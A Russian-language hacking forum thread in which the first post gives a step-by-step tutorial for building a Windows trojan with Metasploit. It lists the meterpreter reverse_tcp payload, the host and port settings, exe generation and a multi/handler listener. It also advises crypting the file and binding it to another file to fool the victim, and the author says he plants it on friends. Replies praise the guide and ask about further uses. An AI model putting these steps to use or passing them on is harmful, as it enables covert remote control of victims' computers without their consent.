|
|
Регистрация | Правила форума | Справка | Пользователи | Календарь | Поиск | Сообщения за день | Все разделы прочитаны |
|
Опции темы | Поиск в этой теме | Опции просмотра |
|
2 дн. назад | #1 |
|
Троян с помощью Metasploit
В этой статье я вам расскажу как можно сделать трой с помощью Metasploit Framevork v 3.5.0
Приступим... Для начала обновим hands.ocx и mozg.dll Если сделали то идём дальше, открываем метасплоит и пишем: use windows/meterpreter/reverse_tcp Потом пишем: set lhost ваш_IP set lport port_на_котором_зависнет_трой После того, как сделали пишем следующее: generate -t exe -f zloi_troi.exe Жмём Enter и видем: Written * bytes Если не видим что-то сделали не так! Дальше идём по адресу: Metasploit/msf3 и видим zloi_troj.exe Это и есть наш трой Теперь клиент: Набираем: use exploit/multi/handler Затем: set lhost Ваш_IP set lport порт_указанный_ранее Пишем: exploit И ждём пока жертва запустит файлик Ну естественно трой надо закриптовать и склеить, трой маленький, так-что жертва врятли заподозрит что-то неладное, даже если будет знать реальный размер файла (с которым склеен трой) Я лично использую его чтобы друзьям подсунуть ( ) Но как использовать вам решать Добавлено через 5 минут Не судите строго, моя первоя статья Записал видео [Ссылки доступны только зарегистрированным пользователям
. Регистрируйся тут...]
Последний раз редактировалось RoMu4; 1 день назад в 17:36. Причина: Добавлена ссылка на видео |
|
2 дн. назад | #2 |
|
Неплохо билоби описать команди , и розкрутить ход действий допустим до дедика.
А так молодец, новичкам будет позновательно |
2 дн. назад | #3 |
|
2 дн. назад | #4 | |
Windows 95
Поблагодарили всего: 4
за это сообщение: 0 |
Спасибьо за статью! Никогда бы не подумал, что в метасплоите можно сделать троянчик да и ещё жертве отправить ))
|
|
2 дн. назад | #5 |
|
я как-то спрашивал на форуме что можно замутить из метасплойта.
вот теперь знаю)) а по-конкретнее новичку, что этот трой делает кроме обеспечения связи между компьютером жертвы и меня?
2 дн. назад | #6 |
|
Завтра сделаю видео урок, там всё будет подробно описано (я и сегодня хотел сделать, но с камтазией проблемка была), а насчёт друзей, они не ведутся на разные проги по ускорению нета
Пишите в ЛС если хотите что-то узнать про метасплоит, сделаю видео урок Добавлено через 39 секунд [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...], крутая аватарка Добавлено через 3 минуты А, ещё на последок, в видеоуроке покажу как можно обмениватся файлами и ... ну впрочем всем самым вкусным Добавлено через 6 минут [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...], всё исправлю, но насчёт дедика... может быть попозже, когда комп перестанет вырубацца и винду на виртуалку поставлю... Последний раз редактировалось RoMu4; 2 дн. назад в 21:01. Причина: Добавлено сообщение |
1 день назад | #7 | |
|
Цитата:
1 день назад | #8 |
|
|
1 день назад | #9 |
|
А когда видео сделаешь?
|
1 день назад | #10 |
|
Уже сделал
Добавлено через 1 минуту А, да с видео "неукладка" в момент с "вкусностями" начались лаги, и сьёмку пришлось прикратить Последний раз редактировалось RoMu4; 6 час(ов) назад в 20:35. |
Нижняя навигация | ||||||
|